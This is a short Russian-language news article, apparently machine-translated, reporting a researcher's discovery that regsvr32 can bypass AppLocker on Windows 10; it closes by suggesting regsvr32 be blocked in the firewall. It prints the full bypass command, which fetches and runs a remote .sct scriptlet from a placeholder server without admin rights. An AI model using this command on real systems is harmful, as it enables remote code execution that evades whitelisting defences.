Regsvr32 может быть использован для обхода AppLocker в Windows 10
Исследователь из Колорадо, который носит имя Кейси Смит, обнаружил, что Regsvr32 можно использовать для обхода AppLocker в Windows 10, и это большая проблема для пользователей компьютеров, особенно в бизнес-среде.
AppLocker был впервые представлен в Windows 7 и Windows Server 2008 R2. Он предназначен для того, чтобы администраторы могли указать, какая группа или пользователи могут использовать некоторые или все приложения на основе уникальной идентификации файлов. Если вы человек, который склонен использовать AppLocker, то должно быть общеизвестно, что его можно использовать для создания определенных правил, позволяющих приложениям запускать или останавливать их на своем пути.
Для тех, кто может не знать, Regvr32 может быть использован для регистрации и отмены регистрации DLL. Это не инструмент, запускаемый одним щелчком мыши, поскольку это утилита командной строки, поэтому только опытные пользователи компьютеров должны стремиться воспользоваться тем, что она может предложить.
Мы понимаем, что, используя эту технику, она не изменяет реестр компьютерной системы, что затрудняет администраторам знать, были ли внесены какие-либо изменения.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
«Удивительно то, что regsvr32 уже поддерживает прокси-сервер, использует TLS, следует перенаправлениям и т. Д. И… Вы уже догадались, подписанный двоичный файл MS по умолчанию. Итак, все, что вам нужно сделать, это разместить файл ..sct в месте, которое вы контролируете », — пишет Смит.
Вышеуказанная методика не требует административных привилегий и не изменяет реестр. Кроме того, сценарии могут быть вызваны как по HTTP, так и по HTTPS . На данный момент Microsoft не выпустила патч для этой маленькой проблемы, поэтому единственной возможностью на данный момент является блокировка Regsvr32 через брандмауэр Windows.
Интересно, что софтверный гигант еще не ответил на эту проблему безопасности, стоящую перед его операционной системой. Теперь, когда он выйдет в открытый доступ, мы ожидаем услышать что-то от компании вместе с разговорами о будущем патче.